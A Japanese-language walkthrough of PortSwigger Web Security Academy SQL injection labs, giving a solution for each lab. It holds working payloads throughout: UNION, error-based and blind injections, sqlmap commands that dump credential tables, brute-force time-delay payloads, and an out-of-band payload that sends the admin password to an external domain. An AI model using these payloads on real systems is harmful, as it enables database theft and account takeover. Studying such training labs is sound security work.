Web Security Academy SQL Injection Challenge

• Web Security Academy SQL Injection Challenge
  • SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
  • SQL injection vulnerability allowing login bypass
  • SQL injection attack, querying the database type and version on Oracle
  • SQL injection attack, querying the database type and version on MySQL and Microsoft
  • SQL injection attack, listing the database contents on non-Oracle databases
  • SQL injection attack, listing the database contents on Oracle
  • SQL injection UNION attack, determining the number of columns returned by the query
  • SQL injection UNION attack, finding a column containing text
  • SQL injection UNION attack, retrieving data from other tables
  • SQL injection UNION attack, retrieving multiple values in a single column
  • Blind SQL injection with conditional responses
  • Blind SQL injection with conditional errors
  • Visible error-based SQL injection
  • Blind SQL injection with time delays
  • Blind SQL injection with time delays and information retrieval
  • Blind SQL injection with out-of-band interaction
  • Blind SQL injection with out-of-band data exfiltration
  • SQL injection with filter bypass via XML encoding

SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products.

特に考えることはなしに、Pets' or 'a'='aで終わりです。

SQL injection vulnerability allowing login bypass

This lab contains a SQL injection vulnerability in the login function.
To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.

これも特に考えません。

username: administrator, password=' or 'a'='a' -- を打ち込めばヨシです。

SQL injection attack, querying the database type and version on Oracle

This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string

以下のように送ったときだけ、200 OKが返ることから、返却カラムは2であることがわかります。

Gifts' union select null, null from dual-- --

後は返却カラムのデータ型を特定して、以下のペイロードで終わりです。

Gifts' union select null, banner from v$version-- --

SQL injection attack, querying the database type and version on MySQL and Microsoft

This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.

返却カラムが2で、char型のカラムがあることが以下のペイロードからわかります。

Gifts' union select 'a', null -- --

となると後はやるだけです。

Gifts' union select version(), null -- --

SQL injection attack, listing the database contents on non-Oracle databases

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the administrator user.

脆弱性がある箇所は同じで、データベースはPostgreSQLっぽいです。

SQLmapを使ってデータベース、テーブルをダンプします。

sqlmap -u "URL" --dbms PostgreSQL --tables --dbs

public databaseには、users_lgwazdがあるみたいです。

sqlmap -u "https://0a6500470402342483340a5a00760010.web-security-academy.net/filter?category=Pets" -T users_lgwazd --columns --dump

+----------------------+-----------------+
| password_dkqtbu      | username_bxoyxf |
+----------------------+-----------------+
| 9o93amfm9vi73slj6et6 | administrator   |
| qaxzrgnje384ifrs9t3u | wiener          |
| i2n5npus7fkzsslz1m30 | carlos          |
+----------------------+-----------------+

ダンプできたので、アクセスすれば終わりです。

SQL injection attack, listing the database contents on Oracle

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the administrator user.

Oracle DBで、脆弱な箇所は同じです。

sqlmap -u "https://0aa700e804cdae8d80648ada00b40057.web-security-academy.net/filter?category=Pets" --dbms Oracle --tables --dbs

PETER DATABASEが見つかります。

sqlmap -u "https://0aa700e804cdae8d80648ada00b40057.web-security-academy.net/filter?category=Pets" -T users_pzorur --columns --dump

+----------------------+-----------------+
| PASSWORD_QFLKXV      | USERNAME_HHZGZQ |
+----------------------+-----------------+
| 58p82lukp0xoptsuu99p | administrator   |
| t6myauubswjm445oa6tl | wiener          |
| iw8vojpopqacawo6mk95 | carlos          |
+----------------------+-----------------+

後はアクセスするだけです。

SQL injection UNION attack, determining the number of columns returned by the query

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.
To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.

Postgresっぽいです。

以下をぶち込んだら終わりました。

Pets' union select null, null, null -- -- 

SQL injection UNION attack, finding a column containing text

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.
The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform a SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

Gifts' union select 1, 'a', null -- --

上記を送り、文字型を特定したら、以下の場所にあるランダムな文字列を文字型に入れれば終わりです。

Gifts' union select 1, 'yWWSRK', null -- --

SQL injection UNION attack, retrieving data from other tables

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.
The database contains a different table called users, with columns called username and password.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

sqlmap -u "https://0a3d00980405183581072f0000bf009a.web-security-academy.net/filter?category=Pets" --dbms PostgreSQL --tables --dbs

usersテーブルが見つかります。

sqlmap -u "https://0a3d00980405183581072f0000bf009a.web-security-academy.net/filter?category=Pets" -T users --columns --dump --dbms PostgreSQL

+----------------------+---------------+
| password             | username      |
+----------------------+---------------+
| jtihnt9bzy7854sz0zwc | administrator |
| 5dryqzo2er8airv7756c | wiener        |
| sd2qmxf06c0eef5987ck | carlos        |
+----------------------+---------------+

後はこのクレデンシャルを使ってログインすれば良いです。

SQL injection UNION attack, retrieving multiple values in a single column

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called users, with columns called username and password.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

これもPostgreSQLです。

sqlmap -u "https://0a6a0068033af293803b6c7700ec0009.web-security-academy.net/filter?category=Pets" --dbms PostgreSQL --tables --dbs

usersテーブルが見つかります。

sqlmap -u "https://0a6a0068033af293803b6c7700ec0009.web-security-academy.net/filter?category=Pets" -T users --columns --dump --dbms PostgreSQL

+----------------------+---------------+
| password             | username      |
+----------------------+---------------+
| d2xmp6l7ioh25uxshmmo | administrator |
| 9sotcve85k2jtx76gaoy | wiener        |
| i7o64mzqvy488cdhe93v | carlos        |
+----------------------+---------------+

fin

Blind SQL injection with conditional responses

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.

Postgresqlっぽいです。

sqlmap -u "https://0a2e00ca0359e8238403ce01003400fd.web-security-academy.net/filter?category=Tech+gifts" --dbms PostgreSQL --tables --dbs --cookie='TrackingId=xibXgCvzwLLpP3eT*; session=3GX2yldEgqYo4SSANXtTBJ6iQEEEhSmM' -p 'TrackingId' --level=2 --threads=5 --proxy='http://localhost:8080'

[2 tables]
+-------------------------+
| tracking                |
| users                   |
+-------------------------+

Database: information_schema
[7 tables]
+-------------------------+
| sql_features            |
| sql_implementation_info |
| sql_languages           |
| sql_packages            |
| sql_parts               |
| sql_sizing              |
| sql_sizing_profiles     |
+-------------------------+

Database: pg_catalog
[63 tables]
+-------------------------+
| pg_aggregate            |
| pg_am                   |
| pg_amop                 |
| pg_amproc               |
| pg_attrdef              |
| pg_attribute            |
| pg_auth_members         |
| pg_authid               |
| pg_cast                 |
| pg_class                |
| pg_collation            |
| pg_constraint           |
| pg_conversion           |
| pg_database             |
| pg_db_role_setting      |
| pg_default_acl          |
| pg_depend               |
| pg_description          |
| pg_enum                 |
| pg_event_trigger        |
| pg_extension            |
| pg_foreign_data_wrapper |
| pg_foreign_server       |
| pg_foreign_table        |
| pg_index                |
| pg_inherits             |
| pg_init_privs           |
| pg_language             |
| pg_largeobject          |
| pg_largeobject_metadata |
| pg_namespace            |
| pg_opclass              |
| pg_operator             |
| pg_opfamily             |
| pg_partitioned_table    |
| pg_pltemplate           |
| pg_policy               |
| pg_proc                 |
| pg_publication          |
| pg_publication_rel      |
| pg_range                |
| pg_replication_origin   |
| pg_rewrite              |
| pg_seclabel             |
| pg_sequence             |
| pg_shdepend             |
| pg_shdescription        |
| pg_shseclabel           |
| pg_statistic            |
| pg_statistic_ext        |
| pg_statistic_ext_data   |
| pg_subscription         |
| pg_subscription_rel     |
| pg_tablespace           |
| pg_transform            |
| pg_trigger              |
| pg_ts_config            |
| pg_ts_config_map        |
| pg_ts_dict              |
| pg_ts_parser            |
| pg_ts_template          |
| pg_type                 |
| pg_user_mapping         |
+-------------------------+

sqlmap -u "https://0a2e00ca0359e8238403ce01003400fd.web-security-academy.net/filter?category=Tech+gifts" --cookie='TrackingId=xibXgCvzwLLpP3eT*; session=3GX2yldEgqYo4SSANXtTBJ6iQEEEhSmM' -p 'TrackingId' -T users --columns --dump --dbms PostgreSQL --level=2 --threads=5 --proxy='http://localhost:8080'

+----------------------+---------------+
| password             | username      |
+----------------------+---------------+
| dum6s8rb2961lddg6nco | administrator |
| jheo12ke4rc7bzczza46 | carlos        |
| w9ag1ihps7n4907f215m | wiener        |
+----------------------+---------------+

あとはこれでログインし、終了です。

Blind SQL injection with conditional errors

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.

Oracle DBっぽいです。

sqlmap -u "https://0a3100d404ba4dfc8118ed7d003b00f6.web-security-academy.net/filter?category=Gifts" --dbms Oracle --tables --dbs --cookie='TrackingId=mVcTy4K6rBr3fg4o*; session=NaLE0CooD5zE8Dc81CNpGqUsFu0LmVGn' -p 'TrackingId' --level=2 --threads=5 --PROXY='http://localhost:8080'

SQLmapだとおそすぎたので、手動でやります。

'||(SELECT CASE WHEN LENGTH(password)=$$ THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'

$$が20の時、500 Errorが返ることから、Passwordの長さが20でありそうなことがわかります。

あと1文字ずつ比較していく必要があります。

'||(SELECT CASE WHEN substr(password, $$, 1)='$$' THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'

1つめの$$

2つめの$$

result

hcs37xkbtj27y6hlagbwがパスワードなのでこれを入れて終わりです。

Visible error-based SQL injection

上記のように、Stack Traceが出てくるタイプのラボです。

'||cast((select version()) as int )||'

上記を脆弱な箇所に打ち込むと、

情報を得られます。

ということで、

'||cast((select password from users limit 1) as int)||'

これで終わりです。

Blind SQL injection with time delays

またもやPostgresqlっぽいです。

sqlmap -u "https://0a3800de04e4345d80eab23c00700073.web-security-academy.net/filter?category=Pets" --dbms PostgreSQL --tables --dbs --cookie='TrackingId=xibXgCvzwLLpP3eT*; session=fztQBR8oaLvQglqdXQUiOh2f4Gkvaau9' -p 'TrackingId' --level=2 --threads=10 --proxy='http://localhost:8080'

Time-baseでデータを抜こうとするとかなり時間がかかるので、今回はusers tableに対してのみ行います。

sqlmap -u "https://0a3800de04e4345d80eab23c00700073.web-security-academy.net/filter?category=Pets" --cookie='TrackingId=xibXgCvzwLLpP3eT*; session=fztQBR8oaLvQglqdXQUiOh2f4Gkvaau9' -p 'TrackingId' -T users --columns --dump --dbms PostgreSQL --level=2 --proxy='http://localhost:8080'

なんとなく手動でやったほうが早そうな気がしてきたので、手動でやります

'||(select pg_sleep(5))||'

上記をTrackingIdに打ち込んで、Responseが5sほど遅延することを確認しておきます。

'||(select case when length(password)=$$ then pg_sleep(5) else  pg_sleep(0) end from users where username='administrator')||'

$$に対して、数字を増加させていくと、20で5sの遅延があることから、password長は20であることがわかります。

'||(select case when substring(password, $$, 1)='$$' then pg_sleep(5) else  pg_sleep(0) end from users where username='administrator')||'

あとはこれに総当りするだけです。

IntruderでCluster bombを選択し、

最初の$$はNumbersで1~20を選択

次の$$はBrutoforce

result

lxek48194ipd2nz7y3nhがパスワードなので打ち込んで終わりです。

Blind SQL injection with time delays and information retrieval

またもやPostgres

TrackingIdに対して、

'||(select pg_sleep(5))||'

とすると遅延が発生します

ということで、Blind SQL injection with time delaysと同じ方法なのでそっちを参考にしてください。

Blind SQL injection with out-of-band interaction

' and (select UTL_INADDR.get_host_address('{collabrator domain}') from dual)||'a'='a

{collabrator domain}部分に自身のcollabrator domainを入れると、OOBを感じ取れ、終わりです。

Blind SQL injection with out-of-band data exfiltration

' and (select UTL_INADDR.get_host_address('{DOMAIN}') from dual)||'a'='a

{DOMAIN}には、自身のCollaborator domainを入れて下さい。

OOBを感じ取れたら、

' and (select UTL_INADDR.get_host_address((select password from users where username='administrator')||'.{DOMAIN}') from dual)||'a'='a

このような感じで送ればパスワードを取得できます。

ので、ログインして終わりです

SQL injection with filter bypass via XML encoding

check stockを押下すると以下のようなリクエストが飛びます。

POST /product/stock HTTP/2
Host: 0a9100a50435318981f239d1000a0026.web-security-academy.net
Cookie: session=NwSFu0QFPtvR64T7tuKsHbfigZ6vHqZW
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: ja,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a9100a50435318981f239d1000a0026.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 107
Origin: https://0a9100a50435318981f239d1000a0026.web-security-academy.net
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Postgresqlっぽいです。

1 UNION SELECT username || '~' || password FROM users

上記をいい感じに難読化して終わりです。